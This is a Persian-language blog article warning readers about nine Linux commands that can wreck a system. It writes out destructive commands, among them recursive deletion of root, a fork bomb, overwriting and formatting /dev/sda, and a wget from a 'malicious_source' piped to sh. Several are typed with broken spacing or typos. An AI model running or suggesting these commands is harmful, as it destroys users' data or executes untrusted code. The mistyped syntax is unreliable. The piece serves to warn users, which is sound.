عناوین این مطلب

نه فرمان خطرناک لینوکس که هرگز نباید اجرا شوند!

نه فرمان خطرناک لینوکس که هرگز نباید اجرا شوند!

 

لینوکس سیستم‌عامل محبوبی است. در حالی که سیستم‌عامل ویندوز این روزها از سوی بسیاری از کاربران مورد استفاده قرار می‌گیرد، اما کم نیستند کاربرانی که ترجیح می‌دهند از لینوکس استفاده کنند. لینوکس طیف گسترده‌ای از فرمان‌های مفید را در اختیار کاربران قرار می‌دهد، با این حال، تعدادی از این دستورات خطرناک هستند. به‌طور مثال، اگر نه فرمانی که در ادامه با آن‌ها آشنا خواهید شد را اجرا کنید، آسیب‌پذیری جبران‌ناپذیری به کامپیوترتان وارد خواهد شد.

اکثر فرمان‌های لینوکس مفید و کاربردی هستند، اما این دستورات موضوع مقاله ما نیستند. ما در این مقاله در مجموع نه مورد از دستورات لینوکس که باعث از کارافتادگی هر کامپیوتری می‌شوند را برای شما فهرست کرده‌ایم. دستوراتی که اجرای آن‌ها مشکلات متعددی را برای شما به همراه خواهند آورد.

۱٫ rm –rf

فرمان rm –rf / هر چیزی را حذف می‌کند، به طوری که نه فقط فایل‌های روی هارددیسک، بلکه فایل‌هایی که روی یک رسانه قابل حمل متصل به کامپیوتر وجود داشته باشد را نیز حذف می‌کند.

۲٫ () {: |: &} ;:

‌() {: |: &} ;: به نام بمب‌ فورک (Fork Bomb) نیز شناخته می‌شوند. بمب فورک نه تنها زمان پردازنده مرکزی را مورد استفاده قرار می‌دهد بلکه جدول فرآیندهای سیستم‌عامل را به طور کامل سرریز می‌کند، به‌طوری که در نهایت باعث به وجود آمدن یک حمله انکار سرویس روی یک سیستم لینوکسی شده و اینکار را تا وقتی که سیستم به طور کامل فریز شده و از دسترس خارج شود، ادامه می‌دهد.

۳٫ command > dev / sda

این فرمان داده‌های خامی را تولید کرده و تمامی فایل‌های درون یک بلوک را با داده‌های خام رونویسی می‌کند. در نتیجه حجم قابل توجهی از داده‌ها در یک بلوک از دست می‌روند.

۴٫ mv directory / dev /null

این فرمان همه اطلاعات شخصی شما را به درون یک حفره سیاه ارسال می‌کند، به این معنی که داده‌ها شما برای همیشه از دست خواهند رفت.

۵٫ wget http: // malicious_source –O | sh

خط بالا اسکریپتی را از وب دانلود کرده و آن‌را برای sh ارسال می‌کند. این‌کار باعث اجرای محتوای درون اسکریپت می‌شود. اجرای اسکرپیت‌هایی که از اینترنت دانلود می‌شوند، همیشه خطرناک است. به دلیل این‌که در اکثر موارد اسکرپیت‌ها غیر قابل اعتماد هستند. در نتیجه سعی کنید تا حد امکان از این دستور برای همیشه دوری کنید.

۶٫ mkfs.ex3 / dev / sda

این دستور را می‌توانید معادل فرمت کردن پارتیشن C در سیستم‌عامل ویندوز در نظر بگیرید. به‌طوری که دیگر هرگز به داده‌های خود دست پیدا نخواهید کرد. به این شکل سیستم شما تبدیل به یک دستگاه غیر قابل مصرف می‌شود.

۷٫ > File

این فرمان برای پاک کردن محتوای فایل‌ها مورد استفاده قرار می‌گیرد. اگر دستور بالا همراه با ترکیبی شبیه به > xt.conf اجرا شود، فایل پیکربندی یا هرگونه فایل پیکربندی سیستمی را رونویسی خواهد کرد.

۸٫ ^foo^bar

این فرمان به خطرناکی دستوراتی نیست که به آن‌ها اشاره کردیم. این فرمان به منظور ویرایش فرمانی که قبلا اجرا شده است بدون آن‌که نیازی به تایپ مجدد فرمان ضرورتی داشته باشد مورد استفاده قرار می‌گیرد. در یک وضعیت اشتباه، این دستور به شکل مفرطی باعث وارد شدن آسیب‌های جبران‌ناپذیری می‌شود. به ویژه اگر دستوری که قبلا اجرا شده است را چک نکرده باشید، ^foo^bar می‌تواند خطرناک باشد.

۹٫ Decompression Bomb

زمانی که از شما درخواست می‌شود تا یک فایل فشرده‌شده را باز کنید، محتوای فایل ممکن است به شدت فشرده شده باشد. زمانی که یک فایل را از حالت فشرده خارج می‌کنید، صدها گیگابایت داده استخراج می‌شوند که می‌توانند هارددیسک شما را پر کرده و به این شکل کارایی سیستم شما را پایین آورند. در نتیجه سعی کنید از اینکار اجتناب کنید.

اکنون که با این دستورات آشنا شدید، به خوبی می‌توانید از اجرای این دستورات ممانعت به عمل آورید.

میتونید این مطلب رو با دوستانتون به اشتراک بگذارید
Share on twitter
Share on linkedin
Share on whatsapp
Share on telegram
Share on email

سایر مطالب مرتبط